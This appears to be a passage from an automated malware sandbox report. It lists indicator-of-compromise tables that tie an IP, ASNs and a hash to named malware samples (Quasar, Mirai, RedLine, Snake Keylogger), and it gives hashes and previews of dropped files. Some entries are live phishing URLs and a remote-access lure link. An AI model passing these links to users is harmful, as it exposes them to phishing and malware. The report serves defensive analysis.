195.201.57.90 | WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | /?output=json
195.201.57.90 | ubes6SC7Vd.exe | malicious | Unknown | ipwhois.app/xml/
195.201.57.90 | cOQD62FceM.exe | malicious | Luca Stealer, Rusty Stealer | /?output=json
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ipwho.is | https://go.51.ca | malicious | Unknown | 195.201.57.90
ipwho.is | PatricksParabox.exe.bin.exe | malicious | Quasar | 195.201.57.90
ipwho.is | https://tron2wq18ufc.z13.web.core.windows.net/ | malicious | TechSupportScam | 195.201.57.90
ipwho.is | Bv8oZ8dqT5.exe | malicious | Quasar | 195.201.57.90
ipwho.is | FRoijLOGX5.exe | malicious | Quasar | 195.201.57.90
ipwho.is | xwM9kaAoeY.bat | malicious | Unknown | 195.201.57.90
ipwho.is | Loader.exe | malicious | Quasar | 195.201.57.90
ipwho.is | a3mJZekUZC.exe | malicious | Quasar | 195.201.57.90
ipwho.is | skf7iF4.bat | malicious | Unknown | 195.201.57.90
ipwho.is | Roe5bGkYQx.bat | malicious | Unknown | 195.201.57.90
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | http://sg-adh7.vv.885210.xyz/ | malicious | Unknown | 2.21.65.135
AKAMAI-ASN1EU | https://habora.co.uk/wp-admin/Ope/renew/ | malicious | Unknown | 2.22.242.97
AKAMAI-ASN1EU | https://stearncommmunity.com/profiles/52829086342741 | malicious | Unknown | 23.197.127.21
AKAMAI-ASN1EU | https://9b861c16-89be-495d-af06-94ec1b71b5cd-00-3shcaiuf2cafc.worf.replit.dev/ | malicious | Unknown | 95.101.182.74
AKAMAI-ASN1EU | https://sceanmcommnunmnlty.com/xroea/spwoe/zxiwe | malicious | Unknown | 95.101.149.47
AKAMAI-ASN1EU | https://case-id-1000228223704.counselschambers.co.uk/ | malicious | HTMLPhisher | 2.16.164.8
AKAMAI-ASN1EU | https://sceanmcommnunmnlty.com/sotep/aofpe/zoepr | malicious | Unknown | 95.101.149.47
AKAMAI-ASN1EU | https://case-id-1000228220021.counselschambers.co.uk/ | malicious | HTMLPhisher | 2.18.96.221
AKAMAI-ASN1EU | https://case-id-1000228223943.counselschambers.co.uk/ | malicious | HTMLPhisher | 2.18.96.221
AKAMAI-ASN1EU | https://case-id-1000228224364.counselschambers.co.uk/ | malicious | HTMLPhisher | 88.221.110.227
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-ASDE | http://abhishek9589.github.io/netflixclone/ | malicious | HTMLPhisher | 78.46.22.25
HETZNER-ASDE | http://copyright-accountscenter.github.io/ | malicious | HTMLPhisher | 116.202.166.112
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-ASDE | 1.ps1 | malicious | RHADAMANTHYS | 213.239.239.164
HETZNER-ASDE | na.elf | malicious | Prometei | 88.198.246.242
GBTCLOUDUS | resgod.mpsl.elf | malicious | Mirai | 154.37.70.175
GBTCLOUDUS | sun-crypter.bat | malicious | Quasar | 45.83.244.141
GBTCLOUDUS | cbr.arm5.elf | malicious | Mirai | 45.11.15.111
GBTCLOUDUS | cbr.spc.elf | malicious | Mirai | 45.11.15.120
GBTCLOUDUS | vkD9uOwN6K.exe | malicious | Unknown | 154.9.252.143
GBTCLOUDUS | https://o-invoices.pages.dev/ | malicious | Unknown | 45.94.31.182
GBTCLOUDUS | https://rvsec.innocreed.com/Bin/Invoice_Overdue.Client.exe?h=instance-w08c5r-relay.screenconnect.com&p=443&k=BgIAAACkAABSU0ExAAgAAAEAAQBtb%2FXciCJO5hHyAR3NG5qwkHgKE4K5jxeGBs35Nlncjh1l6g%2B23I88rvlqmL%2FU%2BHDK35q63nY%2BZ%2BacGdqbEGbCs9%2BC5ELjJTyrUFEL0gVqegeArzyszYoIS4ijuI8mGGKzW9tytW5tQhqCPuQeWdSbe0f0ttBWIUk6MfP0L7WpImwpbDzvxtmyMWSxZ8JZg39F6e1w8cQHzLH0aqJX9uvQgIvogbJB0mFXWURVi9ErahW%2BwkXWptsr99acbACeWvHhej11zT9ZPHMMaluuXTiYnS06xPJTJZglT5hvMbl15uReewBWhhwiEVa2S%2BD%2BCQEQGLsz1dpJNd543dQllUPh&s=64c97d87-ba5e-410a-a497-ed72a390ca30&i=&e=Support&y=Guest&r= | malicious | Unknown | 45.94.31.182
GBTCLOUDUS | nklppc.elf | malicious | Unknown | 216.115.185.204
GBTCLOUDUS | m68k.elf | malicious | Unknown | 154.37.70.199
GBTCLOUDUS | g4za.arm7.elf | malicious | Mirai | 216.115.185.217
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | PO-2513203-PDF.js | malicious | Snake Keylogger, VIP Keylogger | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | brave.ps1 | malicious | Unknown | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | justificante de transferencia09454545.exe | malicious | GuLoader, Snake Keylogger | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | Dhl.exe | malicious | DarkTortilla | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe | malicious | Snake Keylogger, VIP Keylogger | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | Doc13032025.vbs | malicious | Unknown | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | y79a2l1FY5.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | 1.ps1 | malicious | RHADAMANTHYS | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | Kiddion's Modest Menu v.1.0.0.exe | malicious | LummaC Stealer, Xmrig | 195.201.57.90
3b5074b1b5d032e5620f69f9f700ff0e | RQ-5218.msi | malicious | AteraAgent | 195.201.57.90
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):404
                                                                                                    Entropy (8bit):3.8173021543470633
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kK3vQ6/YIQklqslltXlRNfOAUMivhClroFH7q0yNXImolv9RUuQ2vmLltC+uWlrn:l/YGjmxMiv8sFbq0yNYmc3Q2XwJ
                                                                                                    MD5:61DF45A4D84B53BFE34FB1C0B289E6E5
                                                                                                    SHA1:F61CD99798E2E1D44CFCB4CCD436E5AB758E2A8F
                                                                                                    SHA-256:88879A8954FD9F061466B4C5C3D5943F0685A4005426DE31ED86E6B72AA60BDB
                                                                                                    SHA-512:3FA283C2B24863C4C03BAC9EF711D8EFEFC3AD316BBF6D3A5D8935FC2873DD81E2DAF71AB76CA195F58A0A2B1F1FBCA68CCD8BEDFE0ECD1ED9F895C5D1BC2098
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .... ....b......(.......2.........ID.....I-m3....................I-m3... ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.A.U.Q.Y.B.M.q.2.a.w.n.1.R.h.6.D.o.h.%.2.F.s.B.Y.g.F.V.7.g.Q.U.A.9.5.Q.N.V.b.R.T.L.t.m.8.K.P.i.G.x.v.D.l.7.I.9.0.V.U.C.E.A.J.0.L.q.o.X.y.o.4.h.x.x.e.7.H.%.2.F.z.9.D.K.A.%.3.D...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11887
                                                                                                    Entropy (8bit):4.901437212034066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                                                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                                                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                                                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                                                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):412
                                                                                                    Entropy (8bit):3.8588583785256123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DCN5DamxMiv8sFFKbpgal7BlD30PLRWAkr:A5amxxvPKb7Ph38L6
                                                                                                    MD5:725B8F1C7A54405F9522A3D68F5D6952
                                                                                                    SHA1:6C1FDC32220F404182D6DCF5892143921DF539B2
                                                                                                    SHA-256:A099EF50B6E6FB2194D64621B1612149418F2DEDDED16B303A9BB9D2CF593C00
                                                                                                    SHA-512:4212C1E6988C5443CCF306C68EF926B020E30BA08CE9B2C6810F2583369697D5FF66E50135B38634AEA0B2AA05F1A0DA18453C4F60C93A0643FC2B5FB20C471A
                                                                                                    Malicious:false
                                                                                                    Preview:p...... ....(...^.S.....(.......2.................y28.....................y28... ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.U.Z.Z.S.Z.E.m.l.4.9.G.j.h.0.j.1.3.P.6.8.w.%.3.D...
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):400
                                                                                                    Entropy (8bit):3.855988276864414
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKujvT5Dll/4XLNfOAUMivhClroFp736ZWx8GrZoAK+SosEwmPcbLOarUuJn:2jvv+bNmxMiv8sFpT6er+OwmUeeL
                                                                                                    MD5:66CA7009B6EF9C9EFEC028EA0034CADE
                                                                                                    SHA1:462BDDEDDFA7DC48D0D83DB3E9109ABF36FD51A8
                                                                                                    SHA-256:75F82E37FC95719DCD4396E02EB85E40DDC85DB38B097245F8BB166FD1EEBF87
                                                                                                    SHA-512:13B835536AC9E69964CC6DAAE2A50EC167CB3207CD14FFEF6E808D3D4207CE4D3CCA75377AB7A7291E76545A00839F8E1CA9BFBB4337C0561487F22D1B25B8CA
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .........2Q.....(.......2.................J......................J... ...............................8...h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.r.j.r.y.d.R.y.t.%.2.B.A.p.F.3.G.S.P.y.p.f.H.B.x.R.5.X.t.Q.Q.U.s.9.t.I.p.P.m.h.x.d.i.u.N.k.H.M.E.W.N.p.Y.i.m.8.S.8.Y.C.E.A.I.5.P.U.j.X.A.k.J.a.f.L.Q.c.A.A.s.O.1.8.o.%.3.D...
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):412
                                                                                                    Entropy (8bit):3.797011397614759
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKqj/d//3XlRNfOAUMivhClroFFKIhipStaHAaloq09Slscqsn:yjVhmxMiv8sFFKbpgal7BlSs
                                                                                                    MD5:AD716B5FAC5C1BB169CCBBE7EA34A712
                                                                                                    SHA1:999DD0338D557C53FBE3F2D02F80E49389F0AC16
                                                                                                    SHA-256:CAAF669FD757C8DE8F8A918CBAFED1440A9734391B888B82A9A57BF4B314751C
                                                                                                    SHA-512:7D1C96EA628C7DF49754F4C9A942BCFFC128B1678B8A81D20A402EB5FC47FEF6A914B7DBC97B94F4CCFB2B9DDA1D34FB9D5866E5439C304B03783E6F2B1906B1
                                                                                                    Malicious:false
                                                                                                    Preview:p...... ....(....2Q.....(.......2........F0I......rJ......................rJ... ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.n.5.b.s.K.V.V.V.8.k.d.J.6.v.H.l.3.O.1.J.0.%.3.D...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (4622), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12424
                                                                                                    Entropy (8bit):3.9111521387304484
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1Ok4xn9THNx0VtggdKTSnNTRZKnRSWdxK3WNIsW1dKtggdKObgRD+0MnaC6HYnws:Qn9Y4Tp2KfitfP7X+
                                                                                                    MD5:4F5119B2163E5B70F8F8ABD45F57B009
                                                                                                    SHA1:3BA519DE477711E0411735AF0302D7CE2206D332
                                                                                                    SHA-256:F85553EC9583109F92DBA4A302AAA99CC7D3723E84CCABE7BE1B17C932CBA148
                                                                                                    SHA-512:4F0CEC539483281FDA7402B1AC34A8DDF4FC6D8DB3EDB87BDBC6934B6FFF2A1FE366C76CD006E23561E0180473A450867138566533FF595205C0B6E32EF50EA5
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.3.-.1.3.T.0.5.:.3.3.:.3.3...4.7.6.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.C.D.d.D.g.i.S.8.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.B.U.I.L.T.I.N.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):44113920
                                                                                                    Entropy (8bit):5.05177724723175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:cKMQsNg+UwKd/xL9UQvNCLjY9RWphzdUuuSFOzti1e0N9RsnnqDNR7X65tUK2ZUG:Uputzn4oKZ
                                                                                                    MD5:7EA2AA82E96CC6ECEB22208B48215F28
                                                                                                    SHA1:20326EAE5343F7E53E037D210CEAA4FD1321CCCB
                                                                                                    SHA-256:6B1280F81032C053D825C1CD594F99B1D929881B5F253B6E3814ED37E36A3337
                                                                                                    SHA-512:E9D7A04C658C641865CB5DFE16485C868FABBEAEC3FCC49D6BD4B5D4AB5C00EF4E06266BD30CADA23BFF710C7740E6E5F18A25ACED1A10FA094E20EC2668328E
                                                                                                    Malicious:false
                                                                                                    Preview:...............?...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W.Q...<.*.!.9.E.6...x.....$.T.K...Z.-.........u.0...'.....N.......c.].~.f...`.......o.......3...l.r...?.....H...i...B...{.....?.....?.....?.....?.....?.....?. ...?.'...?.*...?.;...?.-...?.9...?.....?.....?.....?.....?.....?.....?.0...?.....?.....?.....?.5...?.<...?.....?.8...?.....?.....?.....?.....?.....?.....?.$...?.(...?.#...?.&...?.:...?.2...?.,...?.3...?.....?.....?.>...?.%...?.....?.+...?.6...?.1...?.!...?./...?.....?.....?.4...?.....?.)...?.....?.....?.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):445120
                                                                                                    Entropy (8bit):3.7425442490499385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:WFajhEeTlRcqLBixs11mUTBDWGm/nlua7np3:G
                                                                                                    MD5:9D2F9AD94EDD6EF937D7F09B160970BD
                                                                                                    SHA1:37BBE84B40CA631957CC9EF33C8075A9B134DBA5
                                                                                                    SHA-256:AAFDC72E9D9AEF9DD48489C3C895BBE782DAB61B542C2629AAB9EFC707A0C266
                                                                                                    SHA-512:01046681B5A279A007D7449D019D0B2B9F4D4C64DFE2C5A5F1269EBCAA880FB52EF3203C277D6052460521447E19E86A78139AC155EE4B07245014941EF907AF
                                                                                                    Malicious:false
                                                                                                    Preview:...Gt..............>..........G......................Dta...................-..T....................qS.).....................(`f.....................}.[.....................S..................n...R............. .......y.........................W........................t......................y.)...........`.......y.S.................L...?]E./...............o......#............ ...j...._..............'...=.....D.C....................q..\...................]...'....................k/Y............>...........................!...I3'.......................Bv....................=..a....................G..........................Z...............X.....<8.....................72.O..............."...k........................c.'T....................E..................$...04.;....................k#.................. ..._...................#....<j.c...........................................!...&...............%....z..~...............&...e.'.................(...Z.w.r...............'....h..>.......
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):445568
                                                                                                    Entropy (8bit):3.749415753475971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:RxL9A9f0j1mXVAylXVNEkHJ/5IpxZD6rpfCSSgn:q
                                                                                                    MD5:1767101D1BF79B8C1A0371B2D3F2A56D
                                                                                                    SHA1:7F6C0E17996DF3015690CCC5C61CE71E9347941F
                                                                                                    SHA-256:26B62889378215CA5CFE373BDEE5F0D076234A8E6307201CA384CB9FC798EFF9
                                                                                                    SHA-512:B1EC5C7C0CD32E825E69849A76C3AFCC46B97484193A6B798C6AEB1EC6CFF07F59B64C38FFF6FF2CBA86DAA82543FFDAE9F8C2067687D142E3A775FECDF99C86
                                                                                                    Malicious:false
                                                                                                    Preview:....y..............>..........G......................Dta...................-..T....................qS.).....................(`f.....................}.[.....................S..................n...R............. .......y.........................W........................t......................y.)...........`.......y.S.................L...?]E./...............o......#............ ...j...._..............'...=.....D.C....................q..\...................]...'....................k/Y............>...........................!...I3'.......................Bv....................=..a....................G..........................Z...............X.....<8.....................72.O..............."...k........................c.'T....................E..................$...04.;....................k#.................. ..._...................#....<j.c...........................................!...&...............%....z..~...............&...e.'.................(...Z.w.r...............'....h..>.......
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8282112
                                                                                                    Entropy (8bit):5.0173901623394555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:3FtFyL5XyaYugg+st4jWBmnqnDBgDZdLrnCDSdp9n/q7kwE1cHPnyN1qcHun3qzg:oCRpIPT
                                                                                                    MD5:DD5D92E2CCAEA34A11A0E6C78ED88944
                                                                                                    SHA1:1A0B6387869F76D897139996C7775AD35B5BFDEF
                                                                                                    SHA-256:5718E987AA084E0A05DF99B641C1C7EB8AC4A80DD7C7A712942619815B1D0193
                                                                                                    SHA-512:1A08A70075D570104CE4B6FA31075BDD950ACBC639D9BE76A583A76B35D352E3838CFB758C3983290B0C2D9E03CAC438BAC443BC263E947F47F921770ED9822A
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67928
                                                                                                    Entropy (8bit):3.9229494413252977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:NyzyObo0zq01qMhcgbPquI4q6uqoa2cN:NoHvN7hcOLIaacN
                                                                                                    MD5:2ED44D60A9A8E42D625DAC52B120A9EC
                                                                                                    SHA1:80D31DD76CBED9654D1A4867CA9EE79BDE1CFC61
                                                                                                    SHA-256:AFA392EC157D72537AA28F537C52C0268FA55A0EE81F9568D43D65E377AB300C
                                                                                                    SHA-512:845B49E12DFE41970FACA7DE6B33DF811D1471F6FCAF48A6E7C01170429F880B845A4142E6E881B9A517951A53919CE3E6FE8A08CCB1DD3129E09DA28DDEA2C2
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.299690454077833
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:hVUHiapX7xadptrDT9W84bW664k5Xyvkzr:gHi6xadptrX9WPbR
                                                                                                    MD5:98386C6D43F234E4E9A07E6AD0B3DC34
                                                                                                    SHA1:D970DDA7E2EDA66F3B4B17185E84BD1C920D79C2
